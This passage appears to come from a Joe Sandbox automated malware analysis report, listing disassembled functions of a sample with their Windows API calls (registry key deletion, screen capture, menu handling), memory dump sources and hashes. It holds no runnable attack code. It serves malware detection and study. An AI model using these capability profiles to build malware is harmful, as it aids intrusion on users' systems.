                                                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789009
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789016
                                                                                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00789024
                                                                                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789033
                                                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0078903C
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789043
                                                                                                                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007866D6,?,?,00000000,?), ref: 00789054
                                                                                                                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00790C04,?), ref: 0078906D
                                                                                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0078907D
                                                                                                                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0078909D
                                                                                                                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 007890CD
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007890F5
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0078910B
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                              • Opcode ID: 676afda6ae6067bbbe8f7c0667157d3a4656d4f40c36847a08ecf4b4f681a1ab
                                                                                                                                                                                                                                                                              • Instruction ID: 86a230f3c901c9701634586aa38a44ec2162bf64f4c98dc75d00416a43ca7737
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 676afda6ae6067bbbe8f7c0667157d3a4656d4f40c36847a08ecf4b4f681a1ab
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32412975640209FFDB219FA5DC88EAA7BB8FF89721F248058F905D72A0D7389D41DB24
                                                                                                                                                                                                                                                                              Function 0077C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C154
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C1D2
                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 0077C26A
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C2DE
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0077C2FC
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0077C352
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0077C364
                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0077C382
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0077C3E3
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C3F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                              • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                              • Opcode ID: 8809fd69362e864997a10f3d0f0874b91284166dbbf49689e0b156635863e38d
                                                                                                                                                                                                                                                                              • Instruction ID: 4e06da65d68cfec29afd56ba7047b4b48a344fbc4e17b628e967422c36916bdb
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8809fd69362e864997a10f3d0f0874b91284166dbbf49689e0b156635863e38d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8C1AF70204205AFDB21DF14C494F2ABBE1BF89354F54C49CF55A8B2A2CB79EC46CB96
                                                                                                                                                                                                                                                                              Function 0078A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0078A990
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 0078A9A7
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 0078A9B3
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(0000000F), ref: 0078A9C9
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0078AC15
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0078AC33
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0078AC54
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000003,00000000), ref: 0078AC73
                                                                                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0078AC95
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000005,?), ref: 0078ACBB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                              • String ID: @$(|
                                                                                                                                                                                                                                                                              • API String ID: 3962739598-1671896347
                                                                                                                                                                                                                                                                              • Opcode ID: db568f65abeea5b45ac9024be1810a2a97e5a6bb39d876c3cc264b9229da23f2
                                                                                                                                                                                                                                                                              • Instruction ID: dfd74094c99220d3726b477a5778b6295a6ee907c57ca230ffe943e6b9692179
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db568f65abeea5b45ac9024be1810a2a97e5a6bb39d876c3cc264b9229da23f2
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BB1AE70640219EFEF14DF69C984BAE7BF2FF44700F14806AED45AB295D778A980CB61
                                                                                                                                                                                                                                                                              Function 0078976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007897B6
                                                                                                                                                                                                                                                                              • GetFocus.USER32 ref: 007897C6
                                                                                                                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 007897D1
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00789879
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0078992B
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00789948
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 00789958
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0078998A
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007899CC
                                                                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007899FD
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                              • String ID: 0$(|
                                                                                                                                                                                                                                                                              • API String ID: 1026556194-2412760368
                                                                                                                                                                                                                                                                              • Opcode ID: a8b8b071f52c43367ee19153f2d8fb4568599daf46098955a8be80ba020be61f
                                                                                                                                                                                                                                                                              • Instruction ID: d07f4e54515d39db3d61cd432f653a17aebc0eeb428bf1cbe66454b7843d28ac
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8b8b071f52c43367ee19153f2d8fb4568599daf46098955a8be80ba020be61f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F781C171544301AFD720EF24C884ABB7BE8FB89354F18452DFA8597291DB78E901CBA2
                                                                                                                                                                                                                                                                              Function 00772FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00773035
                                                                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00773045
                                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 00773051
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0077305E
                                                                                                                                                                                                                                                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 007730CA
                                                                                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00773109
                                                                                                                                                                                                                                                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0077312D
                                                                                                                                                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00773135
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0077313E
                                                                                                                                                                                                                                                                              • DeleteDC.GDI32(?), ref: 00773145
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00773150
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                                                                                                                              • Opcode ID: 33cb7d34b0f66071b5c1eca62ca8cd356cf86bf8890c13051378020ecd07451b
                                                                                                                                                                                                                                                                              • Instruction ID: 38e3cb1bb79484b4e07751d9f35a4196b9398b0105a2f34dfaaf41c524c7a656
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33cb7d34b0f66071b5c1eca62ca8cd356cf86bf8890c13051378020ecd07451b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3261F375D00219EFCF14CFA4D888EAEBBB6FF48310F208419E559A7250E779A941DFA4
                                                                                                                                                                                                                                                                              Function 007552AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 007552E6
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00755328
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00755339
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00755345
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075537A
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 007553B2
                                                                                                                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 007553EB
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00755445
                                                                                                                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00755477
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 007554EF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                              • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                              • Opcode ID: 854b2536bc3d382faa02fdf58a68988fc48a261db878021fa251cfe5f2eda670
                                                                                                                                                                                                                                                                              • Instruction ID: 73fe159ed5362fdd837a739d71d5bfc8694038fdaeffccc31315b4869bd88708
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 854b2536bc3d382faa02fdf58a68988fc48a261db878021fa251cfe5f2eda670
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2691E771104B06EFD714CF24C8A4BE9B7AAFF40345F104519FE8A82191EBB9ED59CB91
                                                                                                                                                                                                                                                                              Function 0075C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(007C29C0,000000FF,00000000,00000030), ref: 0075C973
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(007C29C0,00000004,00000000,00000030), ref: 0075C9A8
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 0075C9BA
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 0075CA00
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0075CA1D
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 0075CA49
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 0075CA90
                                                                                                                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0075CAD6
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CAEB
                                                                                                                                                                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075CB0C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                                                                              • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                              • Opcode ID: 3e01979e9d1b29f54c0b8bd48c97ab166658ad06b74c64050cad59ff46d0f98c
                                                                                                                                                                                                                                                                              • Instruction ID: 44b4ef78daf9a3b06f1f94be1336cedd83463ec06cdddc77fe35b35df0c3800a
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e01979e9d1b29f54c0b8bd48c97ab166658ad06b74c64050cad59ff46d0f98c
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED617DB0900349AFDF22CF64C889BEE7FA9FB05345F148059ED11A3291D7B8AD19CB60
                                                                                                                                                                                                                                                                              Function 0075E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0075E4D4
                                                                                                                                                                                                                                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0075E4FA
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075E504
                                                                                                                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 0075E554
                                                                                                                                                                                                                                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0075E570
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                              • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                              • Opcode ID: 104ab1c2e5315f7a7c72a5cf8bf1afc29b4059d974611782bfc13d926891372f
                                                                                                                                                                                                                                                                              • Instruction ID: 1640deda8151567c67d0b53ec4fa10220c33625b1f10677de1d8d0df71972a08
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 104ab1c2e5315f7a7c72a5cf8bf1afc29b4059d974611782bfc13d926891372f
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2410872540214BADB18AB689C4BEFF77ACDF55750F100019F900E60C2FBBC9A4197A5
                                                                                                                                                                                                                                                                              Function 0077D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0077D6C4
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0077D6ED
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0077D7A8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0077D70A
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0077D71D
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0077D72F
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0077D765
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0077D788
                                                                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0077D753
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                              • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                              • Opcode ID: 986aa4499765845cfc9c7f6991d7c5a311b5db40bd57d91b41fd297c6cfd97a1
                                                                                                                                                                                                                                                                              • Instruction ID: 0a8b6f0406d7db00f115acdaebf7806519ba8800517ff01ab9c02ef9647e12da
